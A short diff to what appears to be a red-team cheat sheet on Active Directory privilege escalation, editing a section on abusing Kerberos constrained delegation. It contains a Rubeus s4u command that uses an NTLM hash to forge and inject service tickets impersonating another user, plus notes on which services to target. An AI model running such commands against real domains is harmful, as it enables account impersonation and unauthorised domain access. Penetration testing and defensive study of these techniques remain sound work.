0xJs/RedTeaming_CheatSheet/windows-ad/Domain-Privilege-Escalation.md

 #### Rubeus request and inject TGT + TGS
 - Possbible services: CIFS for directory browsing, HOST and RPCSS for WMI, HOST and HTTP for PowerShell Remoting/WINRM, LDAP for dcsync
-- Impersonate any user except those in groups "Protected Users" or accounts with the "This account is sensitive and cannot be delegated" right
+- Impersonate any user except those in groups "Protected Users" or accounts with the "This account is sensitive and cannot be delegated" right.
+- Make sure they are local admin on the target machine.
 ```
-.\Rubeus.exe s4u /user:<USERNAME> /rc4:<NTLM HASH> /impersonateuser:administrator /domain:<DOMAIN> /msdsspn:<SERVICE ALLOWED TO DELEGATE>/<SERVER FQDN> /altservice:<SECOND SERVICE> /<SERVER FQDN> /ptt
+.\Rubeus.exe s4u /user:<USERNAME> /rc4:<NTLM HASH> /impersonateuser:<USER> /domain:<DOMAIN> /msdsspn:<SERVICE ALLOWED TO DELEGATE>/<SERVER FQDN> /altservice:<SECOND SERVICE> /<SERVER FQDN> /ptt
 ```

 #### Requesting TGT with kekeo